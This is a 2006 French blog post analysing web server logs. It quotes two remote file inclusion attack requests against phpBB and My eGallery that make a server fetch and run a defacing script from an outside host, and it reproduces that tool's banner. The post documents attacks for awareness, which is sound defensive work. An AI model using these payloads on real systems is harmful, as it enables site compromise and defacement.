Tracking web abuse without honeypot
Par Sid,
vendredi 10 février 2006 à 01:03 :: (In)Sécurité
:: lu 6092 fois :: #27
:: rss
:: atom
Read it in english with Google

e temps en temps, je me ballade dans les logs de mon site web, et je dois avouer y trouver parfois des choses intéressantes. Parmi celles-ci, toutes les tentatives aveugles de compromission d'une hypothétique application web vulnérable. Par exemple, ces requêtes effectuées dernièrement :
dsl-xx-xx-xxxxx.ttnet.net.tr - - [08/Feb/2006: 20:55:11 +0100] "GET /modules/Forums/admin/ admin_styles.php?phpbb_root_path= http://ssalerno.free.fr/tool25.dat? &cmd=id HTTP/1.0" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" dsl.staticxxxxxx.ttnet.net.tr - - [09/Feb/2006: 04:17:02 +0100] "GET /modules/My_eGallery/ public/displayCategory.php?basepath= http://ssalerno.free.fr/tool25.dat? &cmd=id HTTP/1.0" 404 244 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
Qu'apprend-on dans ces lignes ?
D'abord, si on ne le savait pas déjà, que des versions de phpBB et My eGallery sont vulnérables à des failles d'inclusion/exécution de code distant, respectivement celle-ci et probablement celle-là (qu'on semble trouver également dans 4nAlbum d'ailleurs). On remarquera que ces deux failles sont vieilles d'au moins deux ans, la seconde concernant même une application, en fait un module d'extension de PhpNuke et PostNuke (décidemment), qui ne semble plus maintenue... Il serait peut-être un peu optimiste de faire l'hypothèse que les kiddies qui utilisent ce type d'attaque obtiennent des résultats, mais si c'est le cas, cela ne manquera pas de laisser songueur sur le niveau de sécurité du web aujourd'hui, et ce n'est pas Bartavelle qui me contredira sur ce point.
Ensuite, on voit que le site http://ssalerno.free.fr/ s'est fait rooté. Surprenant ? Vu le nombre d'attaque de ce type trainant dans mes logs, je dirais que non. L'intrus y a déposé un joli script, tool25.dat, dont on appréciera la banière :
<!-- Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com se for modificar o codigo, por favor, mantenha o nome de seus autores originaise por favor, entre em contato comigo... ae galera, serio, tem mta gente fdp q simplismente usa, nao seja soh um sucker do script, n seja um lammer imbecil, n seja o merda dum script kiddie, n seja um babaca, ajude a melhora-lo tambem!! -->
Cute isn't it ? L'inclusion d'un autre script distant (therules25.dat) est intéressante, même si ce contenu est malheureusement hors ligne. Ceci étant, le cache de Google vous le retrouvera rapidement, ainsi que pas mal d'autre ressources si vous poussez un peu la recherche. Et, enfin, le moins intéressant, on voit la source de l'attaque, à savoir une machine chez un ISP turc.
Comme quoi, même un site Web, tout ce qu'il y a de plus classique, ça fait un bon début de honeypot ;)
Commentaires
1. Le vendredi 10 février 2006 à 12:51, par jme
2. Le samedi 29 juillet 2006 à 00:56, par r3v3ng4ns
Ajouter un commentaire